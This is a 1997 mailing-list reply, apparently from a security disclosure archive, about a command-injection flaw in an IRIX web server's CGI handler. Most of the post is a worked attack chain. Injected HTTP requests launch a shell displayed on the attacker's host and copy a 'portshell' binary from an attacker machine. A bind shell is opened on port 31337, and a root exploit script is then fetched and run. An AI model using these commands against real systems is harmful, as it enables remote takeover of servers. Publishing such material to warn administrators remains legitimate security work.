Re: CPSR 7: IRIX WWW Server

aaronbj51.com

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Aleph One: "Sun Security Bulletin #00147"
• Previous message: Gert Doering: "Security hole in mgetty+sendfax"
• In reply to: Thomas Walter: "Re: CPSR 7: IRIX WWW Server"

On Thu, 24 Jul 1997, Thomas Walter wrote:

[snip]
> enemy% telnet victim 80
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh  -display  enemy:0  -e
> /bin/csh|?data=Download
> UX:sh (sh): ERROR: Connection closed by foreign host.
> enemy%
>
> And voila! - What else do you want? Any other programs to start? Just
> try...
>

        Keep in mind that it isn't necessary to get everything done in one
command.  A string of two or three commands might sometimes be necessary
to get things moving.  For example:
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp      evil_crackerenemy.com:portshell        /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell    31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_crackerenemy.com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]

"portshell" being a program that bound itself to a TCP port and executed a
shell upon receiving a connection.  Boom, shell access obtained under
whatever uid httpd is running as.  Or, one could even create a dummy
inetd.conf and run their own copy of inetd.  The possiblities are
virtually limitless.


                                                --Aaron


- -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- -
         Never let your schooling interfere with your education

• Next message: Aleph One: "Sun Security Bulletin #00147"
• Previous message: Gert Doering: "Security hole in mgetty+sendfax"
• In reply to: Thomas Walter: "Re: CPSR 7: IRIX WWW Server"